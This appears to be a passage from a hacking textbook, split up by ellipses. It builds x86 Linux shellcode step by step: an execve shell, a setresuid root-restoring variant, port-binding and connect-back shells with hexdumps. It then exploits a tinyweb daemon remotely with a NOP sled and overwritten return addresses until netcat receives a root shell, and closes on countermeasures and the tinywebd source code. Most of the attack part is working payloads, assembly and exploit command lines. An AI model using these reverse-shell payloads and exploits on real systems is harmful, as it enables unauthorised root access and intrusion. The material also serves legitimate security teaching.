00000010 08 8d 53 0c b0 0b cd 80 e8 e5 ff ff ff 2f 62 69 |
...
/bi|
00000020 6e 2f 73 68 |n/sh|
00000024
reader@hacking:~/booksrc/shellcodes $ wc -c exec_shell
36 exec_shell
reader@hacking:~/booksrc/shellcodes $

This shellcode can be shrunk down further by redesigning it and using registers
more efficiently
...
When a value is pushed to the stack, ESP is moved up in memory (by
subtracting 4) and the value is placed at the top of the stack
...

The following shellcode uses push instructions to build the necessary structures in
memory for the execve() system call
...
s
BITS 32

; execve(const char *filename, char *const argv [], char *const envp[])
xor eax, eax ; Zero out eax
...

push 0x68732f2f ; Push "//sh" to the stack
...

mov ebx, esp ; Put the address of "/bin//sh" into ebx, via esp
...

mov edx, esp ; This is an empty array for envp
...

mov ecx, esp ; This is the argv array with string ptr
...

int 0x80 ; Do it
...
The extra backslash doesn't matter and is effectively
ignored
...
The resulting shellcode still spawns a shell but is only 25 bytes,
compared to 36 bytes using the jmp call method
...
s
reader@hacking:~/booksrc $ wc -c tiny_shell
25 tiny_shell
reader@hacking:~/booksrc $ hexdump -C tiny_shell
00000000 31 c0 50 68 2f 2f 73 68 68 2f 62 69 6e 89 e3 50 |1
...
P|
00000010 89 e2 53 89 e1 b0 0b cd 80 |
...
|
00000019
reader@hacking:~/booksrc $ export SHELLCODE=$(cat tiny_shell)
reader@hacking:~/booksrc $
...
/notesearch
SHELLCODE will be at 0xbffff9cb
reader@hacking:~/booksrc $
...
2#

A Matter of Privilege
To help mitigate rampant privilege escalation, some privileged processes will
lower their effective privileges while doing things that don't require that kind of
access
...
By changing the effective user ID, the privileges of the process can be
changed
...

SETEGID(2) Linux Programmer's Manual SETEGID(2)
NAME
seteuid, setegid - set effective user or group ID
SYNOPSIS
#include ...
h>

int seteuid(uid_t euid);
int setegid(gid_t egid);
DESCRIPTION
seteuid() sets the effective user ID of the current process
...

Precisely the same holds for setegid() with "group" instead of "user"
...
On error, -1 is returned, and errno is
set appropriately
...

drop_privs
...
h>
void lowered_privilege_function(unsigned char *ptr) {
char buffer[50];
seteuid(5); // Drop privileges to games user
...
This only spawns a shell for the
games user, without root access
...
c
reader@hacking:~/booksrc $ sudo chown root
...
/drop_privs
reader@hacking:~/booksrc $ export SHELLCODE=$(cat tiny_shell)
reader@hacking:~/booksrc $
...
/drop_privs
SHELLCODE will be at 0xbffff9cb
reader@hacking:~/booksrc $
...
2$ whoami
games
sh-3
...
2$

Fortunately, the privileges can easily be restored at the beginning of our
shellcode with a system call to set the privileges back to root
...
The system call number and manual page are shown below
...
h
#define __NR_setresuid 164

#define __NR_setresuid32 208
reader@hacking:~/booksrc $ man 2 setresuid

SETRESUID(2) Linux Programmer's Manual SETRESUID(2)
NAME
setresuid, setresgid - set real, effective and saved user or group ID
SYNOPSIS
#define _GNU_SOURCE
#include ...

The following shellcode makes a call to setresuid() before spawning the shell to
restore root privileges
...
s
BITS 32
; setresuid(uid_t ruid, uid_t euid, uid_t suid);
xor eax, eax ; Zero out eax
...

xor ecx, ecx ; Zero out ecx
...

mov al, 0xa4 ; 164 (0xa4) for syscall #164
int 0x80 ; setresuid(0, 0, 0) Restore all root privs
...

mov al, 11 ; syscall #11
push ecx ; push some nulls for string termination
...

push 0x6e69622f ; push "/bin" to the stack
...

push ecx ; push 32-bit null terminator to stack
...

push ebx ; push string addr to stack above null terminator
...

int 0x80 ; execve("/bin//sh", ["/bin//sh", NULL], [NULL])

This way, even if a program is running under lowered privileges when it's
exploited, the shellcode can restore the privileges
...

reader@hacking:~/booksrc $ nasm priv_shell
...
/getenvaddr SHELLCODE
...
/drop_privs $(perl -e 'print "\xbf\xf9\xff\xbf"x40')
sh-3
...
2# id
uid=0(root) gid=999(reader)
groups=4(adm),20(dialout),24(cdrom),25(floppy),29(audio),30(dip),44(video),46(plugdev),

104(scan
ner),112(netdev),113(lpadmin),115(powerdev),117(admin),999(reader)
sh-3
...
There is a single-byte x86
instruction called cdq, which stands for convert doubleword to quadword
...
Since the registers are 32bit doublewords, it takes two registers to store a 64-bit quadword
...

Operationally, this means if the sign bit of EAX is 0, the cdq instruction will zero
the EDX register
...
Since the stack is 32-bit
aligned, a single byte value pushed to the stack will be aligned as a doubleword
...

The instructions that push a single byte and pop it back into a register take three
bytes, while using xor to zero the register and moving a single byte takes four
bytes

31 C0 xor eax,eax
B0 0B mov al,0xb

compared to

6A 0B push byte +0xb
58 pop eax

These tricks (shown in bold) are used in the following shellcode listing
...

shellcode
...

xor ebx, ebx ; Zero out ebx
...

cdq ; Zero out edx using the sign bit from eax
...

; execve(const char *filename, char *const argv [], char *const envp[])
push BYTE 11 ; push 11 to the stack
...

push ecx ; push some nulls for string termination
...

push 0x6e69622f ; push "/bin" to the stack
...

push ecx ; push 32-bit null terminator to stack
...

push ebx ; push string addr to stack above null terminator
...

int 0x80 ; execve("/bin//sh", ["/bin//sh", NULL], [NULL])

The syntax for pushing a single byte requires the size to be declared
...
These sizes
can be implied from register widths, so moving into the AL register implies the
BYTE size
...

Port-Binding Shellcode
When exploiting a remote program, the shellcode we've designed so far won't
work
...
Port-binding shellcode will bind the shell to a network
port where it listens for incoming connections
...
The following C code binds to
port 31337 and listens for a TCP connection
...
c
#include ...
h>
#include ...
h>
#include ...
sin_family = AF_INET; // Host byte order
host_addr
...
sin_addr
...

memset(&(host_addr
...

bind(sockfd, (struct sockaddr *)&host_addr, sizeof(struct sockaddr));
listen(sockfd, 4);
sin_size = sizeof(struct sockaddr_in);
new_sockfd = accept(sockfd, (struct sockaddr *)&client_addr, &sin_size);
}

These familiar socket functions can all be accessed with a single Linux system call,
aptly named socketcall()
...

reader@hacking:~/booksrc $ grep socketcall /usr/include/asm-i386/unistd
...
call
determines which socket function to invoke
...

User programs should call the appropriate functions by their usual
names
...

The possible call numbers for the first argument are listed in the linux/net
...

From /usr/include/linux/net
...
The calls are simple enough, but some of them require a sockaddr
structure, which must be built by the shellcode
...

reader@hacking:~/booksrc $ gcc -g bind_port
...
/a
...
so
...

(gdb) list 18
13 sockfd = socket(PF_INET, SOCK_STREAM, 0);
14
15 host_addr
...
sin_port = htons(31337); // Short, network byte order
17 host_addr
...
s_addr = INADDR_ANY; // Automatically fill with my IP
...
sin_zero), '\0', 8); // Zero the rest of the struct
...
c, line 13
...
c, line 20
...
out
Breakpoint 1, main () at bind_port
...
All three arguments are pushed to the
stack (but with mov instructions) in reverse order
...

(gdb) cont
Continuing
...
c:20
20 bind(sockfd, (struct sockaddr *)&host_addr, sizeof(struct sockaddr));
(gdb) print host_addr
$1 = {sin_family = 2, sin_port = 27002, sin_addr = {s_addr = 0},
sin_zero = "\000\000\000\000\000\000\000"}
(gdb) print sizeof(struct sockaddr)
$2 = 16
(gdb) x/16xb &host_addr
0xbffff780: 0x02 0x00 0x7a 0x69 0x00 0x00 0x00 0x00
0xbffff788: 0x00 0x00 0x00 0x00 0x00 0x00 0x00 0x00
(gdb) p /x 27002
$3 = 0x697a
(gdb) p 0x7a69
$4 = 31337
(gdb)

The next breakpoint happens after the sockaddr structure is filled with values
...
The sin_family and sin_port elements are both
words, followed by the address as a DWORD
...
The remaining eight bytes after that
are just extra space in the structure
...

The following assembly instructions perform all the socket calls needed to bind to
port 31337 and accept TCP connections
...
The last eight bytes of the sockaddr structure
aren't actually pushed to the stack, since they aren't used
...

bind_port
...

pop eax
cdq ; Zero out edx for use as a null DWORD later
...

inc ebx ; 1 = SYS_SOCKET = socket()
push edx ; Build arg array: { protocol = 0,
push BYTE 0x1 ; (in reverse) SOCK_STREAM = 1,
push BYTE 0x2 ; AF_INET = 2 }
mov ecx, esp ; ecx = ptr to argument array
int 0x80 ; After syscall, eax has socket file descriptor
...
When a connection is
accepted, the new socket file descriptor is put into EAX at the end of this code
...
Fortunately, standard file descriptors make this fusion
remarkably simple
...
Sockets, too, are just file
descriptors that can be read from and written to
...
There is a system call specifically
for duplicating file descriptors, called dup2
...

reader@hacking:~/booksrc $ grep dup2 /usr/include/asm-i386/unistd
...
h>
int dup(int oldfd);
int dup2(int oldfd, int newfd);
DESCRIPTION
dup() and dup2() create a copy of the file descriptor oldfd
...

The bind_port
...

The following instructions are added in the file bind_shell_beta
...
The spawned shell's standard
input and output file descriptors will be the TCP connection, allowing remote shell
access
...
s
; dup2(connected socket, {all three standard I/O file descriptors})
mov ebx, eax ; Move socket FD in ebx
...

push 0x68732f2f ; push "//sh" to the stack
...

mov ebx, esp ; Put the address of "/bin//sh" into ebx via esp
...

mov edx, esp ; This is an empty array for envp
...

mov ecx, esp ; This is the argv array with string ptr
...
In the output below, grep is used to quickly
check for null bytes
...

reader@hacking:~/booksrc $ nasm bind_shell_beta
...
1
...
j
...
jfXCRfhzifS
...
QV
...
|
00000030 80 b0 66 43 52 52 56 89 e1 cd 80 89 c3 6a 3f 58 |
...
j?X|
00000040 31 c9 cd 80 b0 3f 41 cd 80 b0 3f 41 cd 80 b0 0b |1
...
?A
...
R
...
|
00000065
reader@hacking:~/booksrc $ export SHELLCODE=$(cat bind_shell_beta)
reader@hacking:~/booksrc $
...
/notesearch
SHELLCODE will be at 0xbffff97f
reader@hacking:~/booksrc $
...
Then, netcat is used to connect to the root shell on that port
...
0
...
1 31337
localhost [127
...
0
...
With control structures, the repeated calls to dup2 could be shrunk
down to a single call in a loop
...
Disassembling the main function will
show us how the compiler implemented the for loop using assembly instructions
...
This variable is referenced
in relation to the EBP register as [ebp-4]
...
c
reader@hacking:~/booksrc $ gdb -q
...
out
Using host libthread_db library "/lib/tls/i686/cmov/libthread_db
...
1"
...

(gdb)

The loop contains two new instructions: cmp (compare) and jle (jump if less than
or equal to), the latter belonging to the family of conditional jump instructions
...
Then, a conditional jump instruction will jump based on the flags
...
Otherwise, the next jmp instruction
brings execution to the end of the function at 0x080483a6, exiting the loop
...

Using conditional jump instructions, complex programming control structures
such as loops can be created in assembly
...

Inst ruct ion

Descript ion

cmp ,

Compare the destination operand with the source, setting flags for use with a conditional
jump instruction
...

jne

Jump if not equal
...

jle

Jump if less than or equal to
...

jnle

Jump if not less than or equal to
...

jng jnge

Jump if not greater than, or not greater than or equal to
...

xor eax, eax ; Zero eax
...

jle dup_loop ; If ecx <= 2, jump to dup_loop
...
With a more
complete understanding of the flags used by the cmp instruction, this loop can be
shrunk even further
...
These
flags are carry flag (CF), parity flag (PF), adjust flag (AF), overflow flag (OF), zero
flag (ZF), and sign flag (SF)
...
The zero flag is set to true if the result is zero, otherwise it is false
...
This means that, after any instruction with
a negative result, the sign flag becomes true and the zero flag becomes false
...

SF

sign flag True if the result is negative (equal to the most significant bit of result)
...
The jle (jump if less than
or equal to) instruction is actually checking the zero and sign flags
...
The other conditional jump instructions work in a
similar way, and there are still more conditional jump instructions that directly
check individual status flags:
Inst ruct ion Descript ion
jz

Jump to target if the zero flag is set
...

js

Jump if the sign flag is set
...

With this knowledge, the cmp (compare) instruction can be removed entirely if the
loop's order is reversed
...
The shortened loop is shown below, with the changes
shown in bold
...

xor eax, eax ; Zero eax
...

pop ecx

dup_loop:
mov BYTE al, 0x3F ; dup2 syscall #63
int 0x80 ; dup2(c, 0)
dec ecx ; Count down to 0
...

The first two instructions before the loop can be shortened with the
xchg(exchange) instruction
...

This single instruction can replace both of the following instructions, which take
up four bytes:

89 C3 mov ebx,eax
31 C0 xor eax,eax

The EAX register needs to be zeroed to clear only the upper three bytes of the
register, and EBX already has these upper bytes cleared
...
Naturally, this only
works in situations where the source operand's register doesn't matter
...

bind_shell
...

pop eax
cdq ; Zero out edx for use as a null DWORD later
...

inc ebx ; 1 = SYS_SOCKET = socket()
push edx ; Build arg array: { protocol = 0,
push BYTE 0x1 ; (in reverse) SOCK_STREAM = 1,
push BYTE 0x2 ; AF_INET = 2 }
mov ecx, esp ; ecx = ptr to argument array

int 0x80 ; After syscall, eax has socket file descriptor
...

; bind(s, [2, 31337, 0], 16)
push BYTE 0x66 ; socketcall (syscall #102)
pop eax
inc ebx ; ebx = 2 = SYS_BIND = bind()
push edx ; Build sockaddr struct: INADDR_ANY = 0
push WORD 0x697a ; (in reverse order) PORT = 31337
push WORD bx ; AF_INET = 2
mov ecx, esp ; ecx = server struct pointer
push BYTE 16 ; argv: { sizeof(server struct) = 16,
push ecx ; server struct pointer,
push esi ; socket file descriptor }
mov ecx, esp ; ecx = argument array
int 0x80 ; eax = 0 on success
; listen(s, 0)
mov BYTE al, 0x66 ; socketcall (syscall #102)
inc ebx
inc ebx ; ebx = 4 = SYS_LISTEN = listen()
push ebx ; argv: { backlog = 4,
push esi ; socket fd }
mov ecx, esp ; ecx = argument array
int 0x80
; c = accept(s, 0, 0)
mov BYTE al, 0x66 ; socketcall (syscall #102)
inc ebx ; ebx = 5 = SYS_ACCEPT = accept()
push edx ; argv: { socklen = 0,
push edx ; sockaddr ptr = NULL,
push esi ; socket fd }
mov ecx, esp ; ecx = argument array
int 0x80 ; eax = connected socket FD
; dup2(connected socket, {all three standard I/O file descriptors})
xchg eax, ebx ; Put socket FD in ebx and 0x00000005 in eax
...

pop ecx
dup_loop:
mov BYTE al, 0x3F ; dup2 syscall #63
int 0x80 ; dup2(c, 0)
dec ecx ; count down to 0
jns dup_loop ; If the sign flag is not set, ecx is not negative
...

push 0x68732f2f ; push "//sh" to the stack
...

mov ebx, esp ; Put the address of "/bin//sh" into ebx via esp
...

mov edx, esp ; This is an empty array for envp
...

mov ecx, esp ; This is the argv array with string ptr
int 0x80 ; execve("/bin//sh", ["/bin//sh", NULL], [NULL])

This assembles to the same 92-byte bind_shell shellcode used in the previous
chapter
...
s
reader@hacking:~/booksrc $ hexdump -C bind_shell
00000000 6a 66 58 99 31 db 43 52 6a 01 6a 02 89 e1 cd 80 |jfX
...
CRj
...
|
00000010 96 6a 66 58 43 52 66 68 7a 69 66 53 89 e1 6a 10 |
...
j
...
fCCSV
...
fCRRV
...
Y
...
Iy
...
R
...
|
0000005c
reader@hacking:~/booksrc $ diff bind_shell portbinding_shellcode

Connect-Back Shellcode
Port-binding shellcode is easily foiled by firewalls
...
This limits the
user's exposure and will prevent port-binding shellcode from receiving a
connection
...

However, firewalls typically do not filter outbound connections, since that would
hinder usability
...
This means that if the shellcode
initiates the outbound connection, most firewalls will allow it
...
Opening a TCP
connection only requires a call to socket() and a call to connect()
...
The following
connect-back shellcode was made from the bind-port shellcode with a few
modifications (shown in bold)
...
s
BITS 32
; s = socket(2, 1, 0)
push BYTE 0x66 ; socketcall is syscall #102 (0x66)
...

xor ebx, ebx ; ebx is the type of socketcall
...

xchg esi, eax ; Save socket FD in esi for later
...
168
...
72
push WORD 0x697a ; (in reverse order) PORT = 31337
push WORD bx ; AF_INET = 2
mov ecx, esp ; ecx = server struct pointer
push BYTE 16 ; argv: { sizeof(server struct) = 16,
push ecx ; server struct pointer,

push esi ; socket file descriptor }
mov ecx, esp ; ecx = argument array
inc ebx ; ebx = 3 = SYS_CONNECT = connect()
int 0x80 ; eax = connected socket FD
; dup2(connected socket, {all three standard I/O file descriptors})
xchg eax, ebx ; Put socket FD in ebx and 0x00000003 in eax
...

pop ecx
dup_loop:
mov BYTE al, 0x3F ; dup2 syscall #63
int 0x80 ; dup2(c, 0)
dec ecx ; Count down to 0
...

; execve(const char *filename, char *const argv [], char *const envp[])
mov BYTE al, 11 ; execve syscall #11
...

push 0x68732f2f ; push "//sh" to the stack
...

mov ebx, esp ; Put the address of "/bin//sh" into ebx via esp
...

mov edx, esp ; This is an empty array for envp
...

mov ecx, esp ; This is the argv array with string ptr
...
168
...
72, which
should be the IP address of the attacking machine
...
This is made clear when each number is displayed in
hexadecimal:
reader@hacking:~/booksrc $ gdb -q
(gdb) p /x 192
$1 = 0xc0
(gdb) p /x 168
$2 = 0xa8
(gdb) p /x 42
$3 = 0x2a
(gdb) p /x 72
$4 = 0x48
(gdb) p /x 31337
$5 = 0x7a69
(gdb)

Since these values are stored in network byte order but the x86 architecture is in
little-endian order, the stored DWORD seems to be reversed
...
168
...
72 is 0x482aa8c0
...
When the port number 31337 is printed in
hexadecimal using gdb, the byte order is shown in little-endian order
...

The netcat program can also be used to listen for incoming connections with the l command-line option
...
The ifconfig command ensures the IP address of

eth0 is 192
...
42
...

reader@hacking:~/booksrc $ sudo ifconfig eth0 192
...
42
...
168
...
72 Bcast:192
...
42
...
255
...
0
UP BROADCAST MULTICAST MTU:1500 Metric:1
RX packets:0 errors:0 dropped:0 overruns:0 frame:0
TX packets:0 errors:0 dropped:0 overruns:0 carrier:0
collisions:0 txqueuelen:1000
RX bytes:0 (0
...
0 b)
Interrupt:16
reader@hacking:~/booksrc $ nc -v -l -p 31337
listening on [any] 31337
...
From working with this program before, we know that the request
buffer is 500 bytes long and is located at 0xbffff5c0 in stack memory
...

reader@hacking:~/booksrc $ nasm connectback_shell
...
1
...
j
...
jfXCh
...
j
...
C
...
Iy
...
R
...
|
0000004e
reader@hacking:~/booksrc $ wc -c connectback_shell
78 connectback_shell
reader@hacking:~/booksrc $ echo $(( 544 - (4*16) - 78 ))
402
reader@hacking:~/booksrc $ gdb -q --batch -ex "p /x 0xbffff5c0 + 200"
$1 = 0xbffff688
reader@hacking:~/booksrc $

Since the offset from the beginning of the buffer to the return address is 540
bytes, a total of 544 bytes must be written to overwrite the four-byte return
address
...
To ensure proper alignment, the sumof
the NOP sled and shellcode bytes must be divisible by four
...
These are the
bounds of the response buffer, and the memory afterward corresponds to other
values on the stack that might be written to before we change the program's
control flow
...
Repeating the return address 16
times will generate 64 bytes, which can be put at the end of the 544-byte exploit
buffer and keeps the shellcode safely within the bounds of the buffer
...
The
calculations above show that a 402-byte NOP sled will properly align the 78-byte
shellcode and place it safely within the bounds of the buffer
...
Overwriting the

return address with 0xbffff688 should return execution right to the middle of
the NOP sled, while avoiding bytes near the beginning of the buffer, which might
get mangled
...
In the output below,
netcat is used to listen for incoming connections on port 31337
...

Now, in another terminal, the calculated exploit values can be used to exploit the
tinyweb program remotely
...
"\r\n"') | nc -v 127
...
0
...
0
...
1] 80 (www) open

Back in the original terminal, the shellcode has connected back to the netcat
process listening on port 31337
...

reader@hacking:~/booksrc $ nc -v -l -p 31337
listening on [any] 31337
...
168
...
72] from hacking
...
168
...
72] 34391
whoami
root

The network configuration for this example is slightly confusing because the
attack is directed at 127
...
0
...
168
...
72
...
168
...
72 is easier to
use in shellcode than 127
...
0
...
Since the loopback address contains two null
bytes, the address must be built on the stack with multiple instructions
...
The
file loopback_shell
...
s that uses the
loopback address of 127
...
0
...
The differences are shown in the following output
...
s loopback_shell
...
168
...
72
--> push DWORD 0x01BBBB7f ; Build sockaddr struct: IP Address = 127
...
0
...
By writing a two-byte WORD of null bytes at ESP+1,
the middle two bytes will be overwritten to form the correct return address
...
These
calculations are shown in the output below, and they result in a 397-byte NOP
sled
...

reader@hacking:~/booksrc $ nasm loopback_shell
...
1
...
j
...
jfXCh
...
T$
...
j
...
C
...
I
...
Rh|
00000040 2f 2f 73 68 68 2f 62 69 6e 89 e3 52 89 e2 53 89 |//shh/bin
...
S
...
|
00000053
reader@hacking:~/booksrc $ wc -c loopback_shell
83 loopback_shell
reader@hacking:~/booksrc $ echo $(( 544 - (4*16) - 83 ))
397
reader@hacking:~/booksrc $ (perl -e 'print "\x90"x397';cat loopback_shell;perl -e 'print
"\x88\
xf6\xff\xbf"x16
...
0
...
1 80
localhost [127
...
0
...

reader@hacking:~ $ nc -vlp 31337
listening on [any] 31337
...
0
...
1] from localhost [127
...
0
...
COUNTERMEASURES
The golden poison dart frog secretes an extremely toxic poison—one frog can emit
enough to kill 10 adult humans
...
In response, the frogs kept evolving stronger and
stronger poisons as a defense
...
This type of co-evolution also happens with
hackers
...
In response, hackers find ways to
bypass and subvert these defenses, and then new defense techniques are created
...
Even though viruses and
worms can cause quite a bit of trouble and costly interruptions for businesses,
they force a response, which fixes the problem
...
Often these flaws are undiscovered for
years, but relatively benign worms such as CodeRed or Sasser force these
problems to be fixed
...
If it weren't for
Internet worms making a public spectacle of these security flaws, they might
remain unpatched, leaving us vulnerable to an attack from someone with more
malicious goals than just replication
...
However, there are more proactive ways to
strengthen security
...
A countermeasure is a
fairly abstract concept; this could be a security product, a set of policies, a
program, or simply just an attentive system administrator
...

Countermeasures That Detect
The first group of countermeasures tries to detect the intrusion and respond in
some way
...
The response might include killing the
connection or process automatically, or just the administrator scrutinizing
everything from the machine's console
...
The sooner an intrusion is detected, the sooner
it can be dealt with and the more likely it can be contained
...

The way to detect an intrusion is to anticipate what the attacking hacker is going
to do
...
Countermeasures that
detect can look for these attack patterns in log files, network packets, or even

program memory
...
Detecting
countermeasures are quite powerful in an electronic world with backup and
restore capabilities
...
Since
the detection might not always be immediate, there are a few "smash and grab"
scenarios where it doesn't matter; however, even then it's better not to leave
tracks
...
Exploiting a vulnerable
program to get a root shell means you can do whatever you want on that system,
but avoiding detection additionally means no one knows you're there
...
From a
concealed position, passwords and data can be quietly sniffed from the network,
programs can be backdoored, and further attacks can be launched on other hosts
...
If you know what they are looking for, you can avoid certain exploit patterns
or mimic valid ones
...

System Daemons
To have a realistic discussion of exploit countermeasures and bypass methods, we
first need a realistic exploitation target
...
In Unix, these programs are usually system
daemons
...
The term daemon was first coined by MIT
hackers in the 1960s
...
In the thought experiment,
Maxwell's demon is a being with the supernatural ability to effortlessly perform
difficult tasks, apparently violating the second law of thermodynamics
...
Daemon programs typically end with a d to signify they
are daemons, such as sshd or syslogd
...
c code on A Tinyweb Server can be made into a
more realistic system daemon
...
This function is used by many system
daemon processes in Linux, and its man page is shown below
...
h>
int daemon(int nochdir, int noclose);
DESCRIPTION
The daemon() function is for programs wishing to detach themselves from
the controlling terminal and run in the background as system daemons
...

Unless the argument noclose is non-zero, daemon() will redirect stan
dard input, standard output and standard error to /dev/null
...
) On suc
cess zero will be returned
...

System daemons run detached from a controlling terminal, so the new tinyweb
daemon code writes to a log file
...
The new tinyweb daemon program will need
to catch the terminate signal so it can exit cleanly when killed
...
When a process
receives a signal, its flow of execution is interrupted by the operating system to
call a signal handler
...
For example, when CTRL-C is typed in a program's
controlling terminal, an interrupt signal is sent, which has a default signal handler
that exits the program
...

Custom signal handlers can be registered using the signal() function
...

signal_example
...
h>
#include ...
h>
/* Some labeled signal defines from signal
...
\n");
exit(0);
}
int main() {
/* Registering signal handlers */
signal(SIGQUIT, signal_handler); // Set signal_handler() as the
signal(SIGTSTP, signal_handler); // signal handler for these
signal(SIGUSR1, signal_handler); // signals
...

while(1) {} // Loop forever
...
Even though the program is stuck looping,
incoming signals will interrupt execution and call the registered signal handlers
...
The signal_handler() function, when finished, returns execution back
into the interrupted loop, whereas the sigint_handler() function exits the
program
...
c
reader@hacking:~/booksrc $
...

reader@hacking:~/booksrc $

Specific signals can be sent to a process using the kill command
...
With the -l
command-line switch, kill lists all the possible signals
...

reader@hacking:~/booksrc $ kill -l
1) SIGHUP 2) SIGINT 3) SIGQUIT 4) SIGILL
5) SIGTRAP 6) SIGABRT 7) SIGBUS 8) SIGFPE
9) SIG KILL 10) SIGUSR1 11) SIGSEGV 12) SIGUSR2
13) SIGPIPE 14) SIGALRM 15) SIGTERM 16) SIGSTKFLT
17) SIGCHLD 18) SIGCONT 19) SIGSTOP 20) SIGTSTP
21) SIGTTIN 22) SIGTTOU 23) SIGURG 24) SIGXCPU
25) SIGXFSZ 26) SIGVTALRM 27) SIGPROF 28) SIGWINCH
29) SIGIO 30) SIGPWR 31) SIGSYS 34) SIGRTMIN
35) SIGRTMIN+1 36) SIGRTMIN+2 37) SIGRTMIN+3 38) SIGRTMIN+4
39) SIGRTMIN+5 40) SIGRTMIN+6 41) SIGRTMIN+7 42) SIGRTMIN+8
43) SIGRTMIN+9 44) SIGRTMIN+10 45) SIGRTMIN+11 46) SIGRTMIN+12
47) SIGRTMIN+13 48) SIGRTMIN+14 49) SIGRTMIN+15 50) SIGRTMAX-14
51) SIGRTMAX-13 52) SIGRTMAX-12 53) SIGRTMAX-11 54) SIGRTMAX-10
55) SIGRTMAX-9 56) SIGRTMAX-8 57) SIGRTMAX-7 58) SIGRTMAX-6
59) SIGRTMAX-5 60) SIGRTMAX-4 61) SIGRTMAX-3 62) SIGRTMAX-2

63) SIGRTMAX-1 64) SIGRTMAX
reader@hacking:~/booksrc $ ps a | grep signal_example
24491 pts/3 R+ 0:17
...
This signal's handler cannot be
changed, so kill -9 can always be used to kill processes
...

reader@hacking:~/booksrc $
...
Fortunately, in the new tinyweb
daemon, signals are only used for clean termination, so the implementation is
simple
...
It writes its output to a log file with
timestamps, and it listens for the terminate (SIGTERM) signal so it can shut down
cleanly when it's killed
...
The new portions of the code are shown in bold in the listing below
...
c
#include ...
h>
#include ...
h>
#include ...
h>
#include ...
h>
#include ...
h"
#include "hacking-network
...
/webroot" // The webserver's root directory
#define LOGFILE "/var/log/tinywebd
...

void handle_shutdown(int signal) {
timestamp(logfd);
write(logfd, "Shutting down
...
\n");
if(daemon(1, 0) == -1) // Fork to a background daemon process
...

signal(SIGINT, handle_shutdown); // Call handle_shutdown when interrupted
...
\n", 15);

host_addr
...
sin_port = htons(PORT); // Short, network byte order
host_addr
...
s_addr = INADDR_ANY; // Automatically fill with my IP
...
sin_zero), '\0', 8); // Zero the rest of the struct
...

sin_size = sizeof(struct sockaddr_in);
new_sockfd = accept(sockfd, (struct sockaddr *)&client_addr, &sin_size);
if(new_sockfd == -1)
fatal("accepting connection");
handle_connection(new_sockfd, &client_addr, logfd);
}
return 0;
}
/* This function handles the connection on the passed socket from the
*
...
The connection is
*
...
socket
...

*/
void handle_connection(int sockfd, struct sockaddr_in *client_addr_ptr, int logfd) {
unsigned char *ptr, request[500], resource[500], log_buffer[500];

int fd, length;
length = recv_line(sockfd, request);
sprintf(log_buffer, "From %s:%d \"%s\"\t", inet_ntoa(client_addr_ptr->sin_addr),
ntohs(client_addr_ptr->sin_port), request);

ptr = strstr(request, " HTTP/"); // Search for valid-looking request
...

ptr = NULL; // Set ptr to NULL (used to flag for an invalid request)
...

if(strncmp(request, "HEAD ", 5) == 0) // Head request
ptr = request+5; // ptr is the URL
...
html"); // add 'index
...

strcpy(resource, WEBROOT); // Begin resource with web root path
strcat(resource, ptr); // and join it with resource path
...

if(fd == -1) { // If file is not found
strcat(log_buffer, " 404 Not Found\n");
send_string(sockfd, "HTTP/1
...

strcat(log_buffer, " 200 OK\n");
send_string(sockfd, "HTTP/1
...

send(sockfd, ptr, length, 0); // Send it to socket
...

}
close(fd); // Close the file
...

} // End if block for valid request
...

timestamp(logfd);
length = strlen(log_buffer);
write(logfd, log_buffer, length); // Write to the log
...

}
/* This function accepts an open file descriptor and returns
* the size of the associated file
...

*/
int get_file_size(int fd) {
struct stat stat_struct;

if(fstat(fd, &stat_struct) == -1)
return -1;
return (int) stat_struct
...
passed to it
...

time_struct = localtime((const time_t *)&now); // Convert to tm struct
...

}

This daemon program forks into the background, writes to a log file with
timestamps, and cleanly exits when it is killed
...
This function is set up as the callback handler
for the terminate and interrupt signals, which allows the program to exit
gracefully when it's killed with the kill command
...
Notice that
the log file contains timestamps as well as the shutdown message when the
program catches the terminate signal and calls handle_shutdown()to exit
gracefully
...
c
reader@hacking:~/booksrc $ sudo chown root
...
/tinywebd
reader@hacking:~/booksrc $
...

reader@hacking:~/booksrc $
...
0
...
1
The web server for 127
...
0
...
/tinywebd
25075 pts/3 R+ 0:00 grep tinywebd
reader@hacking:~/booksrc $ kill 25058
reader@hacking:~/booksrc $ ps ax | grep tinywebd
25121 pts/3 R+ 0:00 grep tinywebd
reader@hacking:~/booksrc $ cat /var/log/tinywebd
...
log: Permission denied
reader@hacking:~/booksrc $ sudo cat /var/log/tinywebd
...

07/22/2007 17:57:00> From 127
...
0
...
0" 200 OK
07/22/2007 17:57:21> Shutting down
...
Both programs are vulnerable to the same
overflow exploit; however, the exploitation is only the beginning
...

Tools of the Trade
With a realistic target in place, let's jump back over to the attacker's side of the
fence
...
Like
a set of lock picks in the hands of a professional, exploits open many doors for a
hacker
...

In previous chapters, we've written exploit code in C and manually exploited
vulnerabilities from the command line
...
Exploit
programs are more like guns than tools
...
Both guns
and exploit programs are finalized products that can be used by unskilled people
with dangerous results
...
With an understanding of programming, it's
only natural that a hacker would begin to write his own scripts and tools to aid
exploitation
...
Like conventional tools, they can be used for many purposes,
extending the skill of the user
...
As in the development of our previous exploits, GDB is
used first to figure out the details of the vulnerability, such as offsets
...
c program, but a
daemon program presents added challenges
...
In the output below, a breakpoint is set after the daemon() call, but the
debugger never hits it
...
c
reader@hacking:~/booksrc $ sudo gdb -q
...
out
warning: not using untrusted file "/home/reader/
...
so
...

(gdb) list 47
42
43 if (setsockopt(sockfd, SOL_SOCKET, SO_REUSEADDR, &yes, sizeof(int)) == -1)
44 fatal("setting socket option SO_REUSEADDR");
45
46 printf("Starting tiny web daemon
...

48 fatal("forking to daemon process");
49
50 signal(SIGTERM, handle_shutdown); // Call handle_shutdown when killed
...

(gdb) break 50

Breakpoint 1 at 0x8048e84: file tinywebd
...

(gdb) run
Starting program: /home/reader/booksrc/a
...

Program exited normally
...
In order to debug this program, GDB needs
to be told to follow the child process, as opposed to following the parent
...
After this change, the debugger will
follow execution into the child process, where the breakpoint can be hit
...

A fork or vfork creates a new process
...

By default, the debugger will follow the parent process
...
out
Starting tiny web daemon
...
c:50
50 signal(SIGTERM, handle_shutdown); // Call handle_shutdown when killed
...
Exit anyway? (y or n) y
reader@hacking:~/booksrc $ ps aux | grep a
...
0 0
...
out
reader 1207 0
...
0 2880 748 pts/2 R+ 06:13 0:00 grep a
...
After killing
any stray a
...

reader@hacking:~/booksrc $
...

reader@hacking:~/booksrc $ ps aux | grep tinywebd
root 25830 0
...
0 1636 356 ? Ss 20:10 0:00
...
0 0
...
c
